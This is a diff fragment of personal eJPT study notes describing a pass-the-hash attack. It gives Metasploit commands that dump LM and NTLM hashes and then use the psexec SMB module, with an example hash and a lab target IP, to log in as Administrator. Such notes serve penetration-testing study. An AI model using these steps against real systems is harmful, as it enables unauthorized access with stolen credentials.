Maercusxch/eJPT_Notes/4_Host & Network Penetration Testing/01_System & Host Based Attacks.md

 This technique will allow us to obtain access to the target system via legitimate credentials as opposed to obtaining access via service exploitation.

 ### Practical Pass-The-Hash Attack

+For this module you need the LM Hash in addition to the NTLM hash.
+You can just type in `hash dump` and it displays both hashes.
+- `service postgresql start && msfconsole`
+- `use exploit/windows/smb/psexec`
+- `set LPORT ` to another port than the currently running session
+- `set RHOST 10.2.28.132`
+- `set SMBUser Administrator`
+- `set SMBPass (LM + NTLM Hash of the target machine)` Example: aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d
+- `set target Command or Native\ upload`
+- `exploit`